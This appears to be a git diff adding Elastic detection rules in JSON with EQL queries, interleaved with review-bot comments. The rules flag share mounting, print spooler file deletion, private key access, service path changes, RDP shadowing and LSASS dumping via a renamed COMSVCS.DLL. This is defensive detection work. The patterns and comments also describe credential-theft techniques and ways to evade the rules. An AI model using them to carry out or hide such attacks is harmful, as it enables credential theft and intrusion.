@@ -0,0 +1,153 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of net.exe to mount a WebDav or hidden remote share. This may indicate lateral movement or preparation for data exfiltration.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.process-*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Mounting Hidden or WebDav Remote Shares", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n ((process.name : \"net.exe\" or ?process.pe.original_file_name == \"net.exe\") or ((process.name : \"net1.exe\" or ?process.pe.original_file_name == \"net1.exe\") and\n not process.parent.name : \"net.exe\")) and\n process.args : \"use\" and\n /* including hidden and webdav based online shares such as onedrive */\n process.args : (\"\\\\\\\\*\\\\*$*\", \"\\\\\\\\*@SSL\\\\*\", \"http*\") and\n /* excluding shares deletion operation */\n not process.args : \"/d*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work 
effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.002", + "name": "SMB/Windows Admin Shares", + "reference": "https://attack.mitre.org/techniques/T1021/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1078", + "name": "Valid Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/", + "subtechnique": [ + { + "id": "T1078.003", + "name": "Local Accounts", + "reference": "https://attack.mitre.org/techniques/T1078/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1087", + "name": "Account Discovery", + "reference": "https://attack.mitre.org/techniques/T1087/", + "subtechnique": [ + { + "id": "T1087.001", + "name": "Local Account", + "reference": "https://attack.mitre.org/techniques/T1087/001/" + }, + { + "id": "T1087.002", + "name": "Domain Account", + "reference": "https://attack.mitre.org/techniques/T1087/002/" + } + ] + } + ] + } + ], + "timestamp_override": 
"event.ingested", + "type": "eql", + "version": 109 + }, + "id": "c4210e1c-64f2-4f48-b67e-b5a8ffe3aa14_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_106.json b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_106.json new file mode 100644 index 00000000000..74c2c43aa78 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_106.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects deletion of print driver files by an unusual process. This may indicate a clean up attempt post successful privilege escalation via Print Spooler service related vulnerabilities.", + "false_positives": [ + "Uninstall or manual deletion of a legitimate printing driver files. Verify the printer file metadata such as manufacturer and signature information." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Print Spooler File Deletion", + "query": "file where host.os.type == \"windows\" and event.type : \"deletion\" and\n not process.name : (\"spoolsv.exe\", \"dllhost.exe\", \"explorer.exe\") and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\*.dll\"\n", + "references": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c4818812-d44f-47be-aaef-4cfb2f9cc799", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "c4818812-d44f-47be-aaef-4cfb2f9cc799_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_107.json b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_107.json new file mode 100644 index 00000000000..e0fc914e422 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c4818812-d44f-47be-aaef-4cfb2f9cc799_107.json 
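Review bot: The exclusion list in `query` is keyed on `process.name`, so any binary renamed to `spoolsv.exe`, `dllhost.exe` or `explorer.exe` and run from a writable directory is silently excluded from the rule, whereas the sibling rule c55badd3 in this same commit scopes its exclusions with full `process.executable` paths. Consider replacing the name match with path matches along the lines of `not process.executable : ("?:\\Windows\\System32\\spoolsv.exe", "?:\\Windows\\System32\\dllhost.exe", "?:\\Windows\\explorer.exe")` (plus the SysWOW64 equivalents where they exist) and adding `process.executable` to `required_fields`. The same applies to the _107 hunk that follows, which only narrows the endpoint index pattern to `logs-endpoint.events.file-*`.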
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects deletion of print driver files by an unusual process. This may indicate a clean up attempt post successful privilege escalation via Print Spooler service related vulnerabilities.", + "false_positives": [ + "Uninstall or manual deletion of a legitimate printing driver files. Verify the printer file metadata such as manufacturer and signature information." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious Print Spooler File Deletion", + "query": "file where host.os.type == \"windows\" and event.type : \"deletion\" and\n not process.name : (\"spoolsv.exe\", \"dllhost.exe\", \"explorer.exe\") and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\*.dll\"\n", + "references": [ + "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "c4818812-d44f-47be-aaef-4cfb2f9cc799", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - 
https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Use Case: Vulnerability", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "c4818812-d44f-47be-aaef-4cfb2f9cc799_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c55badd3-3e61-4292-836f-56209dc8a601_2.json b/packages/security_detection_engine/kibana/security_rule/c55badd3-3e61-4292-836f-56209dc8a601_2.json new file mode 100644 index 00000000000..18ade50c2be --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c55badd3-3e61-4292-836f-56209dc8a601_2.json 
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Attackers may try to access private keys, e.g. ssh, in order to gain further authenticated access to the environment.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Attempted Private Key Access", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n process.args : (\"*.pem *\", \"*.pem\", \"*.id_rsa*\") and\n not process.args: (\"--tls-cert\", \"--ssl-cert\") and\n not process.executable : (\n \"?:\\\\ProgramData\\\\Logishrd\\\\LogiOptions\\\\Software\\\\*\\\\LogiLuUpdater.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\*\\\\osqueryd.exe\",\n \"?:\\\\Program Files\\\\Guardicore\\\\gc-controller.exe\",\n \"?:\\\\Program Files\\\\Guardicore\\\\gc-deception-agent.exe\",\n \"?:\\\\Program Files\\\\Guardicore\\\\gc-detection-agent.exe\",\n \"?:\\\\Program Files\\\\Guardicore\\\\gc-enforcement-agent.exe\",\n \"?:\\\\Program Files\\\\Guardicore\\\\gc-guest-agent.exe\",\n \"?:\\\\Program Files\\\\Logi\\\\LogiBolt\\\\LogiBoltUpdater.exe\",\n \"?:\\\\Program Files (x86)\\\\Schneider Electric EcoStruxure\\\\Building Operation 5.0\\\\Device Administrator\\\\Python\\\\python.exe\",\n \"?:\\\\Program Files\\\\Splunk\\\\bin\\\\openssl.exe\",\n \"?:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\openssl.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Logi\\\\LogiBolt\\\\LogiBoltUpdater.exe\",\n \"?:\\\\Windows\\\\system32\\\\icacls.exe\",\n \"?:\\\\Windows\\\\System32\\\\OpenSSH\\\\*\"\n )\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "c55badd3-3e61-4292-836f-56209dc8a601", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1552", + "name": "Unsecured Credentials", + "reference": "https://attack.mitre.org/techniques/T1552/", + "subtechnique": [ + { + "id": "T1552.004", + "name": "Private Keys", + "reference": "https://attack.mitre.org/techniques/T1552/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "c55badd3-3e61-4292-836f-56209dc8a601_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c5677997-f75b-4cda-b830-a75920514096_2.json b/packages/security_detection_engine/kibana/security_rule/c5677997-f75b-4cda-b830-a75920514096_2.json new file mode 100644 index 00000000000..ac282e8c74b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c5677997-f75b-4cda-b830-a75920514096_2.json 
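Review bot: The `process.args` patterns in `query` are evaluated against individual argument values, so the trailing-space form `"*.pem *"` appears to fire only when a single argument itself contains `.pem ` followed by more text, which reads as if it were written for `process.command_line`. If the intent is to catch a `.pem` path anywhere on the command line, the bare `"*.pem"` pattern already covers a standalone argument and the spaced variant is presumably either redundant or belongs in `process.command_line : "*.pem *"`; please confirm against the data source. A one-line explanation in `description` of why both forms are kept would help the next maintainer.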
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies attempts to modify a service path setting using sc.exe. Attackers may attempt to modify existing services for persistence or privilege escalation.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Service Path Modification via sc.exe", + "query": "process where event.type == \"start\" and process.name : \"sc.exe\" and\n process.args : \"*config*\" and process.args : \"*binPath*\"\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "c5677997-f75b-4cda-b830-a75920514096", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": 
"https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/", + "subtechnique": [ + { + "id": "T1543.003", + "name": "Windows Service", + "reference": "https://attack.mitre.org/techniques/T1543/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "c5677997-f75b-4cda-b830-a75920514096_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_108.json b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_108.json new file mode 100644 index 00000000000..74800b2e190 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/c57f8579-e2a5-4804-847f-f2732edc5156_108.json 
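Review bot: The `tags` array lists only `"Tactic: Defense Evasion"`, while the rule's own `threat` mapping covers three tactics (TA0005 Defense Evasion, TA0003 Persistence, TA0004 Privilege Escalation); most other rules in this commit carry one `Tactic:` tag per mapped tactic, so tag-based filtering on Persistence or Privilege Escalation will not surface this rule. Adding `"Tactic: Persistence"` and `"Tactic: Privilege Escalation"` next to the existing tag keeps the metadata consistent. Separately, unlike the sibling EQL rules here, `query` has no `host.os.type == "windows"` guard; `sc.exe` is Windows-only so this is mostly harmless, but adding the guard (and `host.os.type` to `required_fields`) avoids evaluating the rule against non-Windows events in `logs-endpoint.events.*`.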
@@ -0,0 +1,117 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the modification of the Remote Desktop Protocol (RDP) Shadow registry or the execution of processes indicative of an active RDP shadowing session. An adversary may abuse the RDP Shadowing feature to spy on or control other users active RDP sessions.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Remote Desktop Shadowing Activity", + "query": "/* Identifies the modification of RDP Shadow registry or\n the execution of processes indicative of active shadow RDP session */\n\nany where host.os.type == \"windows\" and\n(\n (event.category == \"registry\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\Shadow\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\Shadow\"\n )\n ) or\n (event.category == \"process\" and event.type == \"start\" and\n (process.name : (\"RdpSaUacHelper.exe\", \"RdpSaProxy.exe\") and process.parent.name : \"svchost.exe\") or\n (process.pe.original_file_name : \"mstsc.exe\" and process.args : \"/shadow:*\")\n )\n)\n", + "references": [ + "https://bitsadm.in/blog/spying-on-users-using-rdp-shadowing", + "https://swarm.ptsecurity.com/remote-desktop-services-shadowing/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" 
+ }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c57f8579-e2a5-4804-847f-f2732edc5156", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.001", + "name": "Remote Desktop Protocol", + "reference": "https://attack.mitre.org/techniques/T1021/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "c57f8579-e2a5-4804-847f-f2732edc5156_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_108.json b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_108.json new file mode 100644 index 00000000000..4f2c3b8db69 --- /dev/null 
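Review bot: Operator precedence in `query` leaves the `mstsc.exe /shadow:*` branch outside the `event.category == "process" and event.type == "start"` guard: EQL binds `and` tighter than `or`, so the second alternative parses as `(event.category == "process" and event.type == "start" and (process.name : (...) and process.parent.name : "svchost.exe")) or (process.pe.original_file_name : "mstsc.exe" and process.args : "/shadow:*")`. Under `any where`, the mstsc branch therefore matches any event that carries those fields, including non-start process events, which can produce duplicate alerts for a single shadowing session. Wrapping the two process alternatives in their own parentheses fixes it: `(event.category == "process" and event.type == "start" and ((process.name : ("RdpSaUacHelper.exe", "RdpSaProxy.exe") and process.parent.name : "svchost.exe") or (process.pe.original_file_name : "mstsc.exe" and process.args : "/shadow:*")))`.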
+++ b/packages/security_detection_engine/kibana/security_rule/c5c9f591-d111-4cf8-baec-c26a39bc31ef_108.json 
@@ -0,0 +1,136 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious renamed COMSVCS.DLL Image Load, which exports the MiniDump function that can be used to dump a process memory. This may indicate an attempt to dump LSASS memory while bypassing command-line based detection in preparation for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Credential Access via Renamed COM+ Services DLL", + "note": "## Triage and analysis\n\n### Investigating Potential Credential Access via Renamed COM+ Services DLL\n\nCOMSVCS.DLL is a Windows library that exports the MiniDump function, which can be used to dump a process memory. Adversaries may attempt to dump LSASS memory using a renamed COMSVCS.DLL to bypass command-line based detection and gain unauthorized access to credentials.\n\nThis rule identifies suspicious instances of rundll32.exe loading a renamed COMSVCS.DLL image, which can indicate potential abuse of the MiniDump function for credential theft.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process, such as network connections, registry or file modifications, and any spawned child processes.\n- Identify the process that created the DLL using file creation events.\n - Inspect the file for useful metadata, such as file size and creation or modification time.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable and DLL using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal 
Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Look for the presence of relevant artifacts on other systems. Identify commonalities and differences between potentially compromised systems.\n\n### False positive analysis\n\n- False positives may include legitimate instances of rundll32.exe loading a renamed COMSVCS.DLL image for non-malicious purposes, such as during software development, testing, or troubleshooting.\n\n### Related Rules\n\n- Potential Credential Access via LSASS Memory Dump - 9960432d-9b26-409f-972b-839a959e79e2\n- Suspicious Module Loaded by LSASS - 3a6001a0-0939-4bbe-86f4-47d8faeb7b97\n- Suspicious Lsass Process Access - 128468bf-cab1-4637-99ea-fdf3780a4609\n- LSASS Process Access via Windows API - ff4599cb-409f-4910-a239-52e4e6f532ff\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Implement Elastic Endpoint Security to detect and prevent further post exploitation activities in the environment.\n - Contain the affected system by isolating it from the network to prevent further spread of the attack.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - 
Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore the affected system to its operational state by applying any necessary patches, updates, or configuration changes.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by process.entity_id with maxspan=1m\n [process where host.os.type == \"windows\" and event.category == \"process\" and\n process.name : \"rundll32.exe\"]\n [process where host.os.type == \"windows\" and event.category == \"process\" and event.dataset : \"windows.sysmon_operational\" and event.code == \"7\" and\n (file.pe.original_file_name : \"COMSVCS.DLL\" or file.pe.imphash : \"EADBCCBB324829ACB5F2BBE87E5549A8\") and\n /* renamed COMSVCS */\n not file.name : \"COMSVCS.DLL\"]\n", + "references": [ + "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + 
"type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.pe.imphash", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "c5c9f591-d111-4cf8-baec-c26a39bc31ef", + "setup": "## Setup\n\nYou will need to enable logging of ImageLoads in your Sysmon configuration to include COMSVCS.DLL by Imphash or Original\nFile Name.\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Defense Evasion", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 108 + }, + 
